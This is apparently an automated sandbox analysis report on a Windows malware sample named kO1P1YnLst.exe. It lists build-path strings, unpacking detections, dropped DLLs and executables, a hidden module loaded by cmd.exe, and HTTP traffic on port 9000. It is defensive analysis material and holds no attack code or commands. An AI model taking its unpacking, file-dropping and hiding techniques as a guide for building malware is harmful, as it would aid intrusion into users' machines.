Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdbF source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdbf source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb. source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042888940.00000240F7CA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_it-it\obj\Release\Locale_it-it.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3035558933.00000240F7960000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027735940.00000240F7080000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042888940.00000240F7CA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb4 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3035558933.00000240F7960000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ja-jp\obj\Release\Locale_ja-jp.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: wntdll.pdbUGP source: run.exe, 00000002.00000002.1883500412.00000000031A0000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000002.00000002.1888596388.00000000049F8000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000002.00000002.1888307607.0000000004640000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138665040.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2139000539.00000000057B0000.00000004.00001000.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2140183623.0000000003C40000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139995282.00000000038E4000.00000004.00000020.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2140368721.0000000003FF7000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2370662584.00000000058E0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2367955603.0000000005409000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: /_/obj/Release/TelemetryChannel/net452/Microsoft.AI.ServerTelemetryChannel.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3071636257.00000240FE6A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3013066621.000002409001C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ;C:\timisa37 vugut_daxub.pdb source: kO1P1YnLst.exe, 00000000.00000003.1743343365.0000000005DC1000.00000004.00000020.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000000.1740698273.0000000000413000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3044777911.00000240F7D50000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: c:\Users\dahall\Documents\Visual Studio 2010\Projects\TaskService\obj\Release\Microsoft.Win32.TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveSDK\obj\Debug\PerceiveSDK.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: SMCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\timisa37 vugut_daxub.pdb source: kO1P1YnLst.exe, 00000000.00000003.1743343365.0000000005DC1000.00000004.00000020.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000000.1740698273.0000000000413000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\nuze3\jimikusub 32\keb61_foyemi\38-vovake.pdb source: kO1P1YnLst.exe
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdbR source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: nss3.pdb source: u5c4.0.exe, 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\Perceive\obj\Debug\Perceive.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_zh-tw\obj\Release\Locale_zh-tw.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp

Source: kO1P1YnLst.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: kO1P1YnLst.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: kO1P1YnLst.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: kO1P1YnLst.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: kO1P1YnLst.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe

Unpacked PE file: 1.2.u5c4.0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Unpacked PE file: 0.2.kO1P1YnLst.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Unpacked PE file: 1.2.u5c4.0.exe.400000.0.unpack

Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe

Code function: 1_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_00416240

Source: relay.dll.0.dr	Static PE information: real checksum: 0x18dd31 should be: 0x1877ea
Source: relay.dll.2.dr	Static PE information: real checksum: 0x18dd31 should be: 0x1877ea
Source: IIDHJDGCGD.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x8897e
Source: khjsru.15.dr	Static PE information: real checksum: 0x0 should be: 0xc411c
Source: tiktok[1].exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x8897e
Source: pasb.3.dr	Static PE information: real checksum: 0x0 should be: 0xc411c
Source: kO1P1YnLst.exe	Static PE information: real checksum: 0x7838b should be: 0x78394

Source: u5c4.3.exe.0.dr	Static PE information: section name: .didata
Source: nss3[1].dll.1.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.1.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.1.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.1.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.1.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.1.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.1.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.1.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.1.dr	Static PE information: section name: .didat
Source: nss3.dll.1.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_0042786C push ecx; ret	0_2_0042787C
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_0042780C push eax; ret	0_2_0042782A
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_0042E3A5 push esi; ret	0_2_0042E3AE
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_00409D06 push ecx; ret	0_2_00409D19
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_004097B6 push ecx; ret	0_2_004097C9
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_042574D3 pushad ; retf	0_2_042574D4
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_04258568 push ecx; iretd	0_2_0425856E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_04259D81 pushad ; retf	0_2_04259D88
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_0425B7F3 push ebp; iretd	0_2_0425B826
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_04259A6B push 2B991403h; ret	0_2_04259A72
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_0425A391 push 00000061h; retf	0_2_0425A399
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_05BE9F6D push ecx; ret	0_2_05BE9F80
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_05BFC9FD push esp; retf	0_2_05BFC9FE
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_05BFC3FF push esp; retf	0_2_05BFC407
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_05C01B72 push dword ptr [esp+ecx-75h]; iretd	0_2_05C01B76
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_05BE9A1D push ecx; ret	0_2_05BE9A30
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Code function: 0_2_05C07A73 push eax; ret	0_2_05C07A91
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_004176C5 push ecx; ret	1_2_004176D8
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: 2_2_00EFFAB6 push ecx; ret	2_2_00EFFAC9
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: 2_2_00EFFB55 push ecx; ret	2_2_00EFFB68
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: 2_2_00DB0F0B push 8B00F6D1h; retf	2_2_00DB0F10
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: 2_2_6C8947D9 push ecx; ret	2_2_6C8947EC
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: 2_2_6C896365 push ecx; ret	2_2_6C896378

Source: pasb.3.dr	Static PE information: section name: .text entropy: 6.816444465715168
Source: khjsru.15.dr	Static PE information: section name: .text entropy: 6.816444465715168

Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	File created: C:\Users\user\AppData\Roaming\SecureClient\relay.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	File created: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Jump to dropped file
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	File created: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File created: C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe	Jump to dropped file
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	File created: C:\Users\user\AppData\Local\Temp\u5c4.2\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	File created: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\khjsru	Jump to dropped file
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	File created: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	File created: C:\Users\user\AppData\Local\Temp\u5c4.2\relay.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\pasb	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\pasb			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\khjsru			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\PASB
Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\KHJSRU

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49814
